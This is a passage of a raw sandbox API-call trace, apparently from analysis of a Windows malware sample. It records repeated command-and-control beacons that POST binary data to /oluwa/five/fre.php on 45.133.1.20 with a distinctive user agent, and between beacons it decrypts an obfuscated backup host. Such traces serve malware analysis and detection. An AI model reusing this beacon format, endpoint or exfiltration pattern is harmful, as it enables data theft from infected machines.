ai_canonname=0x0, ai_addr=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0180.590] GetProcessHeap () returned 0x6a0000 [0180.590] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0180.590] socket (af=2, type=1, protocol=6) returned 0x3e4 [0180.591] connect (s=0x3e4, name=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0180.615] FreeAddrInfoW (pAddrInfo=0x6bf878*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be850*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0180.615] GetProcessHeap () returned 0x6a0000 [0180.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0180.617] GetProcessHeap () returned 0x6a0000 [0180.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0180.618] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0180.619] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0180.619] GetProcessHeap () returned 0x6a0000 [0180.619] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0180.619] GetProcessHeap () returned 0x6a0000 [0180.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0180.620] GetProcessHeap () returned 0x6a0000 [0180.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0180.620] GetProcessHeap () returned 0x6a0000 [0180.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0180.621] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0180.622] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0180.622] GetProcessHeap () returned 0x6a0000 [0180.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0180.622] GetProcessHeap () returned 0x6a0000 [0180.622] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0180.622] send (s=0x3e4, buf=0x6bbd20*, len=242, flags=0) returned 242 [0180.623] send (s=0x3e4, buf=0x6bb998*, len=159, flags=0) returned 159 [0180.623] GetProcessHeap () returned 0x6a0000 [0180.623] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0180.623] recv (in: s=0x3e4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0180.706] GetProcessHeap () returned 0x6a0000 [0180.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0180.707] GetProcessHeap () returned 0x6a0000 [0180.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0180.708] GetProcessHeap () returned 0x6a0000 [0180.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0180.709] GetProcessHeap () returned 0x6a0000 [0180.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0180.709] closesocket (s=0x3e4) returned 0 [0180.710] GetProcessHeap () returned 0x6a0000 [0180.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0180.710] GetProcessHeap () returned 0x6a0000 [0180.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0180.711] GetProcessHeap () returned 0x6a0000 [0180.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0180.711] GetProcessHeap () returned 0x6a0000 [0180.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0180.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1058) returned 0x3e4 [0180.713] Sleep (dwMilliseconds=0xea60) [0180.715] GetProcessHeap () returned 0x6a0000 [0180.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0180.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.716] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.722] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0180.731] GetProcessHeap () returned 0x6a0000 [0180.731] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0180.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.732] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0180.733] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.733] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.735] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.735] GetProcessHeap () returned 0x6a0000 [0180.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0180.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.739] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0180.740] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.740] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0180.741] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.741] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0180.742] GetProcessHeap () returned 0x6a0000 [0180.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0180.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.742] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0180.743] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.743] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0180.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.744] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0180.745] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.745] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0180.745] GetProcessHeap () returned 0x6a0000 [0180.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0180.745] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0180.753] GetProcessHeap () returned 0x6a0000 [0180.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0180.754] GetProcessHeap () returned 0x6a0000 [0180.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0180.754] GetProcessHeap () returned 0x6a0000 [0180.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0180.754] GetProcessHeap () returned 0x6a0000 [0180.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0180.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.756] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.773] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0180.786] GetProcessHeap () returned 0x6a0000 [0180.786] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0180.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.787] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0180.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.827] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0180.828] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.831] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0180.831] GetProcessHeap () returned 0x6a0000 [0180.832] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0180.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.834] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0180.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.835] CryptDestroyKey (hKey=0x6ad560) returned 1 [0180.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.836] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0180.837] GetProcessHeap () returned 0x6a0000 [0180.837] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0180.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.838] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0180.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.839] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0180.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.844] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0180.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0180.845] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0180.845] GetProcessHeap () returned 0x6a0000 [0180.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0180.845] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfaa8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be988*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0180.845] GetProcessHeap () returned 0x6a0000 [0180.845] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0180.845] socket (af=2, type=1, protocol=6) returned 0x3e8 [0180.847] connect (s=0x3e8, name=0x6be988*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0180.878] FreeAddrInfoW (pAddrInfo=0x6bfaa8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be988*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0180.878] GetProcessHeap () returned 0x6a0000 [0180.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0180.878] GetProcessHeap () returned 0x6a0000 [0180.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0180.879] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0180.880] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0180.880] GetProcessHeap () returned 0x6a0000 [0180.880] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0180.880] GetProcessHeap () returned 0x6a0000 [0180.881] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0180.881] GetProcessHeap () returned 0x6a0000 [0180.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0180.881] GetProcessHeap () returned 0x6a0000 [0180.881] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0180.882] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0180.885] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0180.885] GetProcessHeap () returned 0x6a0000 [0180.885] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0180.885] GetProcessHeap () returned 0x6a0000 [0180.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0180.886] send (s=0x3e8, buf=0x6bbd20*, len=242, flags=0) returned 242 [0180.886] send (s=0x3e8, buf=0x6bb998*, len=159, flags=0) returned 159 [0180.887] GetProcessHeap () returned 0x6a0000 [0180.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0180.887] recv (in: s=0x3e8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0180.969] GetProcessHeap () returned 0x6a0000 [0180.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0180.970] GetProcessHeap () returned 0x6a0000 [0180.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0180.971] GetProcessHeap () returned 0x6a0000 [0180.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0180.972] GetProcessHeap () returned 0x6a0000 [0180.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0180.973] closesocket (s=0x3e8) returned 0 [0180.974] GetProcessHeap () returned 0x6a0000 [0180.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0180.974] GetProcessHeap () returned 0x6a0000 [0180.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0180.974] GetProcessHeap () returned 0x6a0000 [0180.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0180.975] GetProcessHeap () returned 0x6a0000 [0180.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0180.975] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x105c) returned 0x3e8 [0180.979] Sleep (dwMilliseconds=0xea60) [0180.981] GetProcessHeap () returned 0x6a0000 [0180.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0180.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.983] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0180.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0180.991] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0181.003] GetProcessHeap () returned 0x6a0000 [0181.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0181.004] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.006] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0181.007] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.008] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.009] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.009] GetProcessHeap () returned 0x6a0000 [0181.009] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0181.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.011] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0181.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.020] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0181.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.022] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0181.022] GetProcessHeap () returned 0x6a0000 [0181.022] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0181.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.023] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0181.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.023] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0181.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.024] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0181.025] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.025] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0181.025] GetProcessHeap () returned 0x6a0000 [0181.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0181.025] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0181.026] GetProcessHeap () returned 0x6a0000 [0181.026] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0181.026] GetProcessHeap () returned 0x6a0000 [0181.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0181.027] GetProcessHeap () returned 0x6a0000 [0181.027] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0181.027] GetProcessHeap () returned 0x6a0000 [0181.027] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0181.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.028] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0181.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.035] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0181.045] GetProcessHeap () returned 0x6a0000 [0181.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0181.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.047] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0181.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.048] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0181.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.049] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0181.049] GetProcessHeap () returned 0x6a0000 [0181.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0181.105] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.106] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0181.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.110] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0181.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0181.112] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0181.112] GetProcessHeap () returned 0x6a0000 [0181.112] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0181.113] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.113] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0181.114] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.115] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0181.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.116] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0181.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0181.117] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0181.117] GetProcessHeap () returned 0x6a0000 [0181.117] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0181.118] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfa08*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0181.118] GetProcessHeap () returned 0x6a0000 [0181.118] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0181.118] socket (af=2, type=1, protocol=6) returned 0x3ec [0181.118] connect (s=0x3ec, name=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0181.225] FreeAddrInfoW (pAddrInfo=0x6bfa08*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0181.225] GetProcessHeap () returned 0x6a0000 [0181.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 